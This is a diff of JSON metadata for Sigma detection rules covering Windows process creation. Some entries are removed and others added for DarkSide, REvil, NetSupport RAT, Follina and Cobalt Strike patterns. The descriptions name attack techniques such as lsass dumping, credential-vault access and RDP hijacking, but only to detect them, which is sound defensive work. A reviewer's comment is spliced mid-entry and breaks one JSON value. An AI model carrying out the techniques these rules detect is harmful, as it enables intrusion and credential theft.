"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", - "value": "Suspect Svchost Activity" - }, - { - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/06/22", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_sysprep_appdata.yml", - "level": "medium", - "logsource.category": "process_creation", 
- "logsource.product": "windows", - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", - "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", - "value": "Sysprep on AppData Folder" - }, - { - "description": "Detects usage of the \"systeminfo\" command to retrieve information", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_systeminfo.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", - "value": "Suspicious Execution of Systeminfo" - }, - { - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "meta": { - "author": "Florian Roth (rule), David ANDRE (additional keywords)", - "creation_date": "2021/12/20", - "falsepositive": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Internal Research", - 
"https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" - ], - "tags": "No established tags" - }, - "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "value": "Suspicious SYSTEM User Process Creation" - }, - { - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "meta": { - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2018/04/09", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_sysvol_access.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2288", - "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ] - }, - "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", - "value": "Suspicious SYSVOL Domain Group Policy Access" - }, - { - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", - "meta": { - "author": "frack113", - "creation_date": "2022/01/30", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "filename": "proc_creation_win_susp_takeown.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ] - }, - "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", - "value": "Suspicious Recursive Takeown" - }, - { - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_target_location_shell32.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.group-ib.com/resources/threat-research/red-curl-2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" - ] - }, - "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", - "value": "Shell32 DLL Execution in Suspicious Directory" - }, - { - "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_taskkill.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", - "value": "Suspicious Execution of Taskkill" - }, - { - "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", - "meta": { - "author": "frack113", - "creation_date": "2021/12/11", - "falsepositive": [ - "Administrator, hotline ask to user" - ], - "filename": "proc_creation_win_susp_tasklist_command.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ] - }, - "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", - "value": "Suspicious Tasklist Discovery Command" - }, - { - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", - "value": "Taskmgr as LOCAL_SYSTEM" - }, - { - "description": "Detects the creation of a process 
from Windows task manager", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/13", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_taskmgr_parent.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", - "value": "Taskmgr as Parent" - }, - { - "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", - "meta": { - "author": "Avneet Singh @v3t0_, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_tracker_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ] - }, - "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", - "value": "DLL Injection with Tracker.exe" - }, - { - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/10", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.youtube.com/watch?v=Ie831jF0bb0", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "value": "Process Access via TrolleyExpress Exclusion" - }, - { - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_tscon_localsystem.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", - "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "9847f263-4a81-424f-970c-875dab15b79b", - "value": "Suspicious TSCON Start as SYSTEM" - }, - { - "description": "Detects a suspicious RDP session redirect using tscon.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", - "value": "Suspicious RDP Redirect Using TSCON" - }, - { - "description": "Detects indicators of a UAC bypass method by mocking directories", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", + "filename": "proc_creation_win_mal_darkside_ransomware.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", - "https://github.com/netero1010/TrustedPath-UACBypass-BOF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" + "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", + "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204" ] }, - "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", - "value": "TrustedPath UAC Bypass Pattern" + "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "value": "DarkSide Ransomware Pattern" }, { - "description": "Detects a suspicious child process of userinit", + "description": "This rule detects execution of PowerShell scripts located in the 
\"C:\\Users\\Public\" folder", "meta": { - "author": "Florian Roth (rule), Samir Bousseaden (idea)", - "creation_date": "2019/06/17", + "author": "Max Altgelt", + "creation_date": "2022/04/06", "falsepositive": [ - "Administrative scripts" + "Unlikely" ], - "filename": "proc_creation_win_susp_userinit_child.yml", + "filename": "proc_creation_win_powershell_public_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/evolution-of-fin7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" + ], + "tags": "No established tags" + }, + "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "value": "Execution of Powershell Script in Public Folder" + }, + { + "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1139811587760562176", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "37e8d358-6408-4853-82f4-98333fca7014", + "value": "Execution of NetSupport RAT From Unusual Location" + }, + { + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "meta": { + "author": 
"Nasreddine Bencherchali", + "creation_date": "2022/06/13", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535663791362519040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1218", + "attack.execution" ] }, - "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", - "value": "Suspicious Userinit Child Process" + "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", + "value": "Execute Pcwrun.EXE To Leverage Follina" }, { "description": "Detects the execution of CSharp interactive console by PowerShell", 
@@ -54949,718 +43788,398 @@ "value": "Suspicious Use of CSharp Interactive Console" }, { - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "description": "Allow Incoming Connections by Port or Application on Windows Firewall", "meta": { - "author": "Agro (@agro_sev) oscd.community", - "creation_date": "2020/10/10", + "author": "Markus Neis, Sander Wiebing", + "creation_date": "2019/01/29", "falsepositive": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + "Legitimate administration" ], - "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", + "filename": "proc_creation_win_netsh_fw_add.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", - "https://twitter.com/bryon_/status/975835709587075072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" ], "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1127" + "attack.t1562.004" ] }, - "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", - "value": "Detection of PowerShell Execution via Sqlps.exe" + "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "value": 
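Review bot: The new `proc_creation_win_powershell_public_folder.yml` entry sets `"tags": "No established tags"`, giving `meta.tags` a string where every sibling entry added in this hunk (DarkSide, NetSupport RAT, Pcwrun/Follina) carries an array, so a consumer that iterates or filters on `tags` will either fail on the string or treat the sentinel text as a tag name. The shape-stable representation is an empty list: `"tags": []`. If this cluster is produced by a generator from the Sigma rule set, the placeholder should be fixed in the generator rather than hand-edited here; the same sentinel appears in the removed `proc_creation_win_susp_system_user_anomaly.yml` entry, so it looks systematic rather than a one-off. The "unsual"/"outisde" typos in the NetSupport RAT description are inherited from the upstream rule text and would likewise need fixing at the source.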
"Netsh Port or Application Allowed" }, { - "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "meta": { - "author": "Agro (@agro_sev) oscd.communitly", - "creation_date": "2020/10/13", - "falsepositive": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." - ], - "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", - "https://twitter.com/pabraeken/status/993298228840992768", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", - "value": "SQL Client Tools PowerShell Session Detection" - }, - { - "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", - "meta": { - "author": "Agro (@agro_sev) oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "It's not an uncommon to use te.exe directly to execute legal TAEF tests" - ], - "filename": "proc_creation_win_susp_use_of_te_bin.yml", - "level": "low", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", - "https://twitter.com/pabraeken/status/993298228840992768", - "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" - ], - "tags": [ - "attack.t1218" - ] - }, - "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", - "value": "Malicious Windows Script Components File Execution by TAEF Detection" - }, - { - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "meta": { - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", - "creation_date": "2020/10/14", - "falsepositive": [ - "The process spawned by vsjitdebugger.exe is uncommon." 
- ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/pabraeken/status/990758590020452353", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", - "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" - ], - "tags": [ - "attack.t1218", - "attack.defense_evasion" - ] - }, - "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", - "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" - }, - { - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "description": "Detects suspicious process related to rundll32 based on arguments", "meta": { "author": "frack113", - "creation_date": "2022/04/08", + "creation_date": "2021/12/04", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rundll32_script_run.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", + "value": "Suspicious Rundll32 Script in CommandLine" + }, + { + "description": "Detects a Windows program executable started from a suspicious folder", + "meta": { + 
"author": "Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "creation_date": "2017/11/27", + "falsepositive": [ + "Exotic software" + ], + "filename": "proc_creation_win_system_exe_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/GelosSnake/status/934900723426439170", + "https://asec.ahnlab.com/en/39828/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "value": "System File Execution Location Anomaly" + }, + { + "description": "Detects usage of findstr with the \"EVERYONE\" keyword. This is often used in combination with icacls to look for misconfigured files or folders permissions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_vaultcmd.yml", + "filename": "proc_creation_win_findstr_recon_everyone.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" ], "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1552.006" ] }, - "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", - "value": "Windows Credential Manager Access via VaultCmd" + "uuid": 
"47e4bab7-c626-47dc-967b-255608c9a920", + "value": "Suspicious Recon Activity Using Findstr Keywords" }, { - "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", "meta": { - "author": "Konstantin Grishchenko, oscd.community", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" - ], - "filename": "proc_creation_win_susp_vboxdrvinst.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", - "https://twitter.com/pabraeken/status/993497996179492864", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", - "value": "Suspicious VBoxDrvInst.exe Parameters" - }, - { - "description": "Detects suspicious inline VBScript keywords as used by UNC2452", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/03/05", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "creation_date": "2019/10/26", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_vbscript_unc2452.yml", + "filename": "proc_creation_win_susp_child_process_as_system_.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 
"https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://github.com/antonioCoco/RogueWinRM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation", + "attack.t1134.002" ] }, - "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", - "value": "Suspicious VBScript UN2452 Pattern" + "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "value": "Suspicious Child Process Created as System" }, { - "description": "Detects commands that temporarily turn off Volume Snapshots", + "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", "meta": { "author": "Florian Roth", - "creation_date": "2021/01/28", + "creation_date": "2021/07/03", "falsepositive": [ - "Legitimate administration" + "Unknown" ], - "filename": "proc_creation_win_susp_volsnap_disable.yml", + "filename": "proc_creation_win_apt_revil_kaseya.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", + "https://www.joesandbox.com/analysis/443736/0/html", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + 
"https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.g0115" + ] + }, + "uuid": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "value": "REvil Kaseya Incident Malware Patterns" + }, + { + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_obfuscated_ip_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "value": "Obfuscated IP Download" + }, + { + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "meta": { + "author": "Wojciech Lesicki", + "creation_date": "2021/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_load_by_rundll32.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1354766164166115331", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + 
